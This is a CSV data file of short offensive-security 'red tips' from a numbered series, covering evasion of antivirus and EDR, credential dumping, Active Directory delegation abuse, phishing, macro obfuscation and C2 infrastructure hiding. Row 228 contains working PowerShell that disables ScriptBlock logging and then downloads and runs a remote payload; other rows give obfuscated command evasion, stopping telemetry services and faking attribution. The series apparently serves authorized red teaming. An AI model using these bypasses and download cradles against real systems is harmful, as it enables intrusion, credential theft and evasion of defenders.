tipid,a,b,line
209,Automate environment prepping and spawn all processes as a child of explorer.exe by @armitagehacker https://github.com/vysec/Aggressor-VYSEC/blob/master/auto-prepenv.cna,,Automate environment prepping and spawn all processes as a child of explorer.exe by @armitagehacker https://github.com/vysec/Aggressor-VYSEC/blob/master/auto-prepenv.cna
210,@subTee highlighted to us that XML requests can be used as a download cradle in constrained language mode!,,@subTee highlighted to us that XML requests can be used as a download cradle in constrained language mode!
211,Check out @armitagehacker's post on OPSEC considerations when using Cobalt Strike's beacon. https://blog.cobaltstrike.com/2017/06/23/opsec-considerations-for-beacon-commands/,,Check out @armitagehacker's post on OPSEC considerations when using Cobalt Strike's beacon. https://blog.cobaltstrike.com/2017/06/23/opsec-considerations-for-beacon-commands/
212,Reset AD passwords from Linux with @mubix https://room362.com/post/2017/reset-ad-user-password-with-linux/ :) proxychains it over your pivot :D,,Reset AD passwords from Linux with @mubix https://room362.com/post/2017/reset-ad-user-password-with-linux/ :) proxychains it over your pivot :D
213,Got a NetNTLMv1 hash? Convert it to NTLM by cracking three DES keys,https://hashcat.net/forum/thread-5912.html,Got a NetNTLMv1 hash? Convert it to NTLM by cracking three DES keys https://hashcat.net/forum/thread-5912.html
214,If you don't 100 percent understand NETNTLMv1 and v2 read up on https://blog.smallsec.ca/2016/11/21/ntlm-challenge-response/,,If you don't 100 percent understand NETNTLMv1 and v2 read up on https://blog.smallsec.ca/2016/11/21/ntlm-challenge-response/
215,If you don't know how LM and NTLM hashing works... go back to basics with https://blog.smallsec.ca/2016/11/07/windows-credentials/,,If you don't know how LM and NTLM hashing works... go back to basics with https://blog.smallsec.ca/2016/11/07/windows-credentials/
216,@424f424f just made me aware that FireEye can prevent runas from executing. Use unmanaged PS to spawn https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/RunAs.ps1,,@424f424f just made me aware that FireEye can prevent runas from executing. Use unmanaged PS to spawn https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/RunAs.ps1
217,S4U can be used to delegate across SPN. So if you have msds-allowedtodelagateto HTTP you can exploit to obtain HOST and CIFS,,S4U can be used to delegate across SPN. So if you have msds-allowedtodelagateto HTTP you can exploit to obtain HOST and CIFS
218,You're in a subnet where people RDP into but you can't attack outwards? Set backdoor over tsclient on start keys. ?,,You're in a subnet where people RDP into but you can't attack outwards? Set backdoor over tsclient on start keys. ?
219,Unsure what the localised admin account might be called or need to copy and paste? Check out https://social.technet.microsoft.com/wiki/contents/articles/13813.localized-names-for-administrator-account-in-windows.aspx,,Unsure what the localised admin account might be called or need to copy and paste? Check out https://social.technet.microsoft.com/wiki/contents/articles/13813.localized-names-for-administrator-account-in-windows.aspx
220,EDR monitoring whoami? Use echo %userprofile% echo %username% Or replace echo with anything that reflects error,ie. set,EDR monitoring whoami? Use echo %userprofile% echo %username% Or replace echo with anything that reflects error ie. set
221,"Network segregation in play? Try Get-NetSubnet, Get-NetSite in PowerView or browse in AD explorer. Can help find your way :)",,"Network segregation in play? Try Get-NetSubnet, Get-NetSite in PowerView or browse in AD explorer. Can help find your way :)"
222,"If you want to simulate MBR activity like #Petya, check out https://github.com/PowerShellMafia/PowerSploit/blob/master/Mayhem/Mayhem.psm1",,"If you want to simulate MBR activity like #Petya, check out https://github.com/PowerShellMafia/PowerSploit/blob/master/Mayhem/Mayhem.psm1"
223,Secure your beach heads against #Petya WMIC /node:host process call create â€œecho > C:\windows\perfcâ€,,Secure your beach heads against #Petya WMIC /node:host process call create â€œecho > C:\windows\perfcâ€
224,Using Linux? Modify /etc/dhcp/dhclient.conf and remove gethostname() for Opsec when you VPN or have to rock up on site.,,Using Linux? Modify /etc/dhcp/dhclient.conf and remove gethostname() for Opsec when you VPN or have to rock up on site.
225,Stuck in a heavily segregated situation on a server? Try RDPInception attack vector out https://www.mdsec.co.uk/2017/06/rdpinception/,,Stuck in a heavily segregated situation on a server? Try RDPInception attack vector out https://www.mdsec.co.uk/2017/06/rdpinception/
226,Reduce AV detection by using fake Microsoft certificate.,,Reduce AV detection by using fake Microsoft certificate.
227,Not using notifications yet for C2 events? For @armitagehacker's Cobalt Strike check out https://github.com/Und3rf10w/Aggressor-scripts,,Not using notifications yet for C2 events? For @armitagehacker's Cobalt Strike check out https://github.com/Und3rf10w/Aggressor-scripts
228,Using PowerShell?,,"Using PowerShell? # ScriptBlock Logging Bypass
# @cobbr_io
$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').""GetFie`ld""('cachedGroupPolicySettings', 'N'+'onPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
iex (New-Object Net.WebClient).downloadstring(""https://myserver/mypayload.ps1"")
Can help you Bypass ScriptBlock Logging for added OpSec :)"
229,"If you can't use Reg class in WMI to exfil in CLM, use @christruncer's OSRecoveryConfiguration! Examples in WMI Implant.",,"If you can't use Reg class in WMI to exfil in CLM, use @christruncer's OSRecoveryConfiguration! Examples in WMI Implant."
230,Sandbox Analysis taking place? @arvanaghi has a centralised repo of anti sandbox techniques https://github.com/Arvanaghi/CheckPlease,,Sandbox Analysis taking place? @arvanaghi has a centralised repo of anti sandbox techniques https://github.com/Arvanaghi/CheckPlease
231,"When facing Sandboxes, learn about filetypes and limitations. Dropped some examples at @Steel_Con and even more at @HITBGSEC!",,"When facing Sandboxes, learn about filetypes and limitations. Dropped some examples at @Steel_Con and even more at @HITBGSEC!"
231,@ropnop wrote https://gist.github.com/ropnop/8711392d5e1d9a0ba533705f7f4f455f â€¦ to perform Kerberos TGT password bruteforce. Potentially stealthier than traditional SMB,,@ropnop wrote https://gist.github.com/ropnop/8711392d5e1d9a0ba533705f7f4f455f â€¦ to perform Kerberos TGT password bruteforce. Potentially stealthier than traditional SMB
231,"Admin to machine X? X has SPN set to delegate access? Bam! Hit machine X, you don't need to crack no machine hash.",,"Admin to machine X? X has SPN set to delegate access? Bam! Hit machine X, you don't need to crack no machine hash."
232,Low privilege prevent ATP sending logs? Modify registry and serve WPAD locally to not send data to Msft Domains. @retBandit,,Low privilege prevent ATP sending logs? Modify registry and serve WPAD locally to not send data to Msft Domains. @retBandit
232,CACTUSTORCH introduces a new set of TTP in Payload Generation. https://github.com/mdsecactivebreach/CACTUSTORCH â€¦ Reduces signature footprints too!,,CACTUSTORCH introduces a new set of TTP in Payload Generation. https://github.com/mdsecactivebreach/CACTUSTORCH â€¦ Reduces signature footprints too!
233,Looking for a decent domain but need to force categorisation? Check out https://github.com/mdsecactivebreach/Chameleon â€¦! - abuses bugs in proxies ???,,Looking for a decent domain but need to force categorisation? Check out https://github.com/mdsecactivebreach/Chameleon â€¦! - abuses bugs in proxies ???
233,Use WSUSPENDU to move laterally with fake updates even across airgapped environments.,,Use WSUSPENDU to move laterally with fake updates even across airgapped environments.
234,"Instead of using rundll32, try control @domchell and winword /L @subTee ? change indicators!",,"Instead of using rundll32, try control @domchell and winword /L @subTee ? change indicators!"
234,Typo squat domains or names containing the target company name might be monitored by registration watch lists.,,Typo squat domains or names containing the target company name might be monitored by registration watch lists.
235,Doing many concurrent adversary simulation gigs? Automate the boring target collection process with https://www.mdsec.co.uk/2017/07/reconnaissance-using-linkedint/,,Doing many concurrent adversary simulation gigs? Automate the boring target collection process with https://www.mdsec.co.uk/2017/07/reconnaissance-using-linkedint/
235,"When deploying infrastructure, aim to have distinct sets that should not allow for correlation to each other.",,"When deploying infrastructure, aim to have distinct sets that should not allow for correlation to each other."
236,Blue looking for net users /domain? Try out n^eT^1 us^er^s /do,,Blue looking for net users /domain? Try out n^eT^1 us^er^s /do
236,"In malware delivery, add user identifiable trackers in the execution container to ensure that further steps not failing.",,"In malware delivery, add user identifiable trackers in the execution container to ensure that further steps not failing."
237,Use SLK files instead of XLS for Excel DDE code exec without protected view issues. Discovered by @enigma0x3,,Use SLK files instead of XLS for Excel DDE code exec without protected view issues. Discovered by @enigma0x3
237,Limiting allowed inbound IP ranges using iptables will restrict the ability for external IR teams to fetch payloads or stage,,Limiting allowed inbound IP ranges using iptables will restrict the ability for external IR teams to fetch payloads or stage
238,Keying implants will reduce the likelihood of execution if any keyed item is incorrect. In long operations useful for stealth.,,Keying implants will reduce the likelihood of execution if any keyed item is incorrect. In long operations useful for stealth.
238,ATP? sc stop diagtrack,,ATP? sc stop diagtrack
239,Over PTH? Use all AES RC4 NTLM.,,Over PTH? Use all AES RC4 NTLM.
239,Finding zero day DLL hijacks with Rattler can be useful for stealthier long term persistence.,,Finding zero day DLL hijacks with Rattler can be useful for stealthier long term persistence.
240,Don't use remote exploitation where possible as IDS will often flag on such attempts.,,Don't use remote exploitation where possible as IDS will often flag on such attempts.
241,Local exploitation may be flagged by endpoint security although less likely.,,Local exploitation may be flagged by endpoint security although less likely.
242,Exploits such as MS17-010 can be routed internally for privilege escalation using portforwards. Lowers risk of IDS detections.,,Exploits such as MS17-010 can be routed internally for privilege escalation using portforwards. Lowers risk of IDS detections.
243,"ATA detects where tools such as UserHunter or BloodHound query AD. Instead, blacklist DCs. Use file shares / high pop servers.",,"ATA detects where tools such as UserHunter or BloodHound query AD. Instead, blacklist DCs. Use file shares / high pop servers."
244,Use WMI or WinAPI calls to perform host recon when up against ATP.,,Use WMI or WinAPI calls to perform host recon when up against ATP.
245,PowerShell Injection Vulnerability Hunter can be integrated into VSCode. Start writing secure offensive PowerShell? ?,,PowerShell Injection Vulnerability Hunter can be integrated into VSCode. Start writing secure offensive PowerShell? ?
246,Be extremely cautious when generating tickets and remember to use AES hashes as default good practice where possible.,,Be extremely cautious when generating tickets and remember to use AES hashes as default good practice where possible.
247,"Wiki, sharepoint, intranet, fileshares often have access control misconfigs. Almost as good as privilege escalation for info.",,"Wiki, sharepoint, intranet, fileshares often have access control misconfigs. Almost as good as privilege escalation for info."
248,@_staaldraad Phishing with OAuth http://staaldraad.github.io/pentest/phishing/2017/08/02/o356-phishing-with-oauth/,,@_staaldraad Phishing with OAuth http://staaldraad.github.io/pentest/phishing/2017/08/02/o356-phishing-with-oauth/
249,Obfuscate your macro documents with @MrUn1k0d3râ€˜s https://github.com/Mr-Un1k0d3r/MaliciousMacroGenerator,,Obfuscate your macro documents with @MrUn1k0d3râ€˜s https://github.com/Mr-Un1k0d3r/MaliciousMacroGenerator
250,Need fast and accurate execution of BloodHound attack paths? try out https://github.com/vysec/ANGRYPUPPY â€¦ by @vysecurity and @001SPARTaN,,Need fast and accurate execution of BloodHound attack paths? try out https://github.com/vysec/ANGRYPUPPY â€¦ by @vysecurity and @001SPARTaN
251,https://github.com/ramen0x3f/AggressorScripts/blob/master/credpocalypse.cna â€¦ can be set on high volume servers to make sure you get all the credentials ;D @ramen0x3f,,https://github.com/ramen0x3f/AggressorScripts/blob/master/credpocalypse.cna â€¦ can be set on high volume servers to make sure you get all the credentials ;D @ramen0x3f
252,PyBrute for Recon (now reconned) by @OrOneEqualsOne https://github.com/OrOneEqualsOne/reconned â€¦ Good for enumeration of subdomains :),,PyBrute for Recon (now reconned) by @OrOneEqualsOne https://github.com/OrOneEqualsOne/reconned â€¦ Good for enumeration of subdomains :)
253,@MrUn1k0d3r releases UniByAv. XOR encrypts shellcode and then does Hyperion type brute force to break the key. ? FUD FUD FUD,,@MrUn1k0d3r releases UniByAv. XOR encrypts shellcode and then does Hyperion type brute force to break the key. ? FUD FUD FUD
Red tip,Use @armitagehacker's CobaltStrike? I'd be careful with NOD32 as it seems to be detecting ElevateKit's use of Powerpick & UacBypass,,Use @armitagehacker's CobaltStrike? I'd be careful with NOD32 as it seems to be detecting ElevateKit's use of Powerpick & UacBypass
254,Load arbitrary DLL from xwizard.exe by @Hexacorn http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/,,Load arbitrary DLL from xwizard.exe by @Hexacorn http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/
255,Use rundll32.exe a lot? Try copy it to another directory to appear as diff name. http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/,,Use rundll32.exe a lot? Try copy it to another directory to appear as diff name. http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/
256,"Use Cloud Hosts / CDNs for redirectors. Unless the cloud provider sells you out, they have no way to find out where the c2 is.",,"Use Cloud Hosts / CDNs for redirectors. Unless the cloud provider sells you out, they have no way to find out where the c2 is."
257,scans.io has some pretty good databases for a list of subdomains potentially for your target. Use the SQL AXFR one!,,scans.io has some pretty good databases for a list of subdomains potentially for your target. Use the SQL AXFR one!
258,"If you're using a domain with the bank's name in it, be careful when registering SSL certs, may get flagged on watch list.",,"If you're using a domain with the bank's name in it, be careful when registering SSL certs, may get flagged on watch list."
259,Payloads served via email links and attachments being sandboxes? Try sending payloads via. direct Skype messages! ?,,Payloads served via email links and attachments being sandboxes? Try sending payloads via. direct Skype messages! ? Red tip - sign up for @VirusTotal intelligence (easy if your company has others using it) - create YARA rules for your domains/tools/handle
260,"Enumerate DevOps stack, WSUS, Endpoint security agents - use these to jump into segregated zones.",,"Enumerate DevOps stack, WSUS, Endpoint security agents - use these to jump into segregated zones."
261,"Once again. Never forget SharePoint, easy search functionality and often yields good results.",,"Once again. Never forget SharePoint, easy search functionality and often yields good results."
262,@_rastamouse shows you how to manually extract relevant RDP credentials from Cred Vault in his labs! https://rastamouse.me/2017/08/jumping-network-segregation-with-rdp/,,@_rastamouse shows you how to manually extract relevant RDP credentials from Cred Vault in his labs! https://rastamouse.me/2017/08/jumping-network-segregation-with-rdp/
263,Use lsadump::dcsync /all /csv in Mimikatz to perform DRSUAPI grabbing of all hashes! Nice.,,Use lsadump::dcsync /all /csv in Mimikatz to perform DRSUAPI grabbing of all hashes! Nice.
264,"SMB leaking fails if proper network segregation. Thank humans for laptops, work from home, cafes and free wifi! @haifeili",,"SMB leaking fails if proper network segregation. Thank humans for laptops, work from home, cafes and free wifi! @haifeili"
265,Domain Fronting Domain lists for popular CDNs can be found at,https://github.com/vysec/DomainFrontingLists â€¦ good for defenders too!,Domain Fronting Domain lists for popular CDNs can be found at https://github.com/vysec/DomainFrontingLists â€¦ good for defenders too!
266,"When performing physical social engineering, don't forget to pretend to actually scan your ID when tailgating",,"When performing physical social engineering, don't forget to pretend to actually scan your ID when tailgating"
267,Using HTAs? Follow @enigma0x3 to keep up-to-date with his discovery of monikers to spawn under different parent processes.,,Using HTAs? Follow @enigma0x3 to keep up-to-date with his discovery of monikers to spawn under different parent processes.
268,Review every column in the DB. Sometimes your objective is mislabeled or hiding in a big table. @malcomvetter,,Review every column in the DB. Sometimes your objective is mislabeled or hiding in a big table. @malcomvetter
269,Remove all document information when creating your Macros. You can even edit the file to put in false attribution data.,,Remove all document information when creating your Macros. You can even edit the file to put in false attribution data.
270,Block common security vendors from grabbing your link payloads https://gist.github.com/curi0usJack/971385e8334e189d93a6cb4671238b10,,Block common security vendors from grabbing your link payloads https://gist.github.com/curi0usJack/971385e8334e189d93a6cb4671238b10. 
272,Aquatone is a DNS discovery tool https://github.com/michenriksen/aquatoneâ€¦. Finds some interesting subdomains that I've not seen in some other sources. :D for ex one time it found me a VPN hostname format that I could then simply brute all combinations to discover more.,,Aquatone is a DNS discovery tool https://github.com/michenriksen/aquatoneâ€¦. Finds some interesting subdomains that I've not seen in some other sources. :D for ex one time it found me a VPN hostname format that I could then simply brute all combinations to discover more.
273,41GB Password dump is a good place to get an idea of username and email formats for target. Also if there are multiple formats in use.,,41GB Password dump is a good place to get an idea of username and email formats for target. Also if there are multiple formats in use.
274,"Password cracking is hard. I love Top297Million-Probable, rockyou was decent for a quick smash, but lately found out about Keyboard Walks. Add keyboard walks with rules into your cracking routines to get more hashes cracked! https://github.com/hashcat/kwprocessor â€¦ Share your ideas!",,"Password cracking is hard. I love Top297Million-Probable, rockyou was decent for a quick smash, but lately found out about Keyboard Walks. Add keyboard walks with rules into your cracking routines to get more hashes cracked! https://github.com/hashcat/kwprocessor â€¦ Share your ideas!"
275,Use Exchange timing attacks to narrow down a predicted list of emails down to an accurate list. Better than checking for bounces. @dafthack https://github.com/dafthack/MailSniper â€¦ implements this attack.,,Use Exchange timing attacks to narrow down a predicted list of emails down to an accurate list. Better than checking for bounces. @dafthack https://github.com/dafthack/MailSniper â€¦ implements this attack.
276,Embed UNC paths into e-mails to leak a hash from the occasional work from home or travelling employee. Several mitigation's for this such as setting no automatic authentication in inetcpl.cpl and use of the host based firewall.,,Embed UNC paths into e-mails to leak a hash from the occasional work from home or travelling employee. Several mitigation's for this such as setting no automatic authentication in inetcpl.cpl and use of the host based firewall. Try using a generic email template.
277,"Got administrative rights across the domain but can't hit certain network segments? Be sure to check out web apps, many places and web apps support â€œscript executionâ€ for administrators. Get a shell and try to hit the target segment from the web app.",,"Got administrative rights across the domain but can't hit certain network segments? Be sure to check out web apps, many places and web apps support â€œscript executionâ€ for administrators. Get a shell and try to hit the target segment from the web app."
278,"Using net users isn't the only way to get users from AD. You don't always need to do it from the endpoint. If EDR is an issue connect to web apps and use intranet, mail, dev stack and other tools to obtain user lists and groups.",,"Using net users isn't the only way to get users from AD. You don't always need to do it from the endpoint. If EDR is an issue connect to web apps and use intranet, mail, dev stack and other tools to obtain user lists and groups."
279,"If you can't beat EDR, go around it! @_RastaMouse",,"If you can't beat EDR, go around it! @_RastaMouse"
280,GPO Misconfigurations are more common than you might think! Not talking about good old cpassword but also file permissions and editable scripts. Check out https://github.com/l0ss/Grouper by @mikeloss that automates this!,,GPO Misconfigurations are more common than you might think! Not talking about good old cpassword but also file permissions and editable scripts. Check out https://github.com/l0ss/Grouper by @mikeloss that automates this!
281,@PyroTek3 has documented lots of AD security related information. Probably not a pure red tip but knowing whether and how the blue team or target might fix an issue definitely helps when trying to discover if they're vulnerable as well as the reporting phase.,,@PyroTek3 has documented lots of AD security related information. Probably not a pure red tip but knowing whether and how the blue team or target might fix an issue definitely helps when trying to discover if they're vulnerable as well as the reporting phase.
282,Although I thought it was clear as Microsoft documented it but LAPS passwords are in clear text to users that have the right privileges in AD. Friendly reminder :) Either just browse LDAP or https://www.harmj0y.net/blog/powershell/running-laps-with-powerview/ â€¦ or https://blog.netspi.com/running-laps-around-cleartext-passwords/ â€¦ @harmj0y @kfosaaen,,Although I thought it was clear as Microsoft documented it but LAPS passwords are in clear text to users that have the right privileges in AD. Friendly reminder :) Either just browse LDAP or https://www.harmj0y.net/blog/powershell/running-laps-with-powerview/ â€¦ or https://blog.netspi.com/running-laps-around-cleartext-passwords/ â€¦ @harmj0y @kfosaaen
283,"Linked to #280, @harmj0y has useful references, information and explanations for discovering GPO permissions. https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/ I just used Get-ACL on SYSVOL. Works for me.",,"Linked to #280, @harmj0y has useful references, information and explanations for discovering GPO permissions. https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/ I just used Get-ACL on SYSVOL. Works for me."
284,Windows Credential Vault is often used to store saved passwords. @_rastamouse walks us through the decryption procedures required to make use of these credentials in his blog post at https://rastamouse.me/2017/08/jumping-network-segregation-with-rdp/,,Windows Credential Vault is often used to store saved passwords. @_rastamouse walks us through the decryption procedures required to make use of these credentials in his blog post at https://rastamouse.me/2017/08/jumping-network-segregation-with-rdp/
285,Automatically switch to the most profitable coin to mine using @rvrsh3lls crypto currency mining assistance PowerShell scripts! https://github.com/rvrsh3ll/CrypoCurrencyPowerShell/blob/master/Mine-BestCoin.ps1,,Automatically switch to the most profitable coin to mine using @rvrsh3lls crypto currency mining assistance PowerShell scripts! https://github.com/rvrsh3ll/CrypoCurrencyPowerShell/blob/master/Mine-BestCoin.ps1
286,"Look for pentest and Security reports. Inboxes, file shares, intranets. Replicate vulnerabilities that other people find and report but haven't been fixed. I've done this so many times because client decrypts a report and archives it in clear text.",,"Look for pentest and Security reports. Inboxes, file shares, intranets. Replicate vulnerabilities that other people find and report but haven't been fixed. I've done this so many times because client decrypts a report and archives it in clear text."
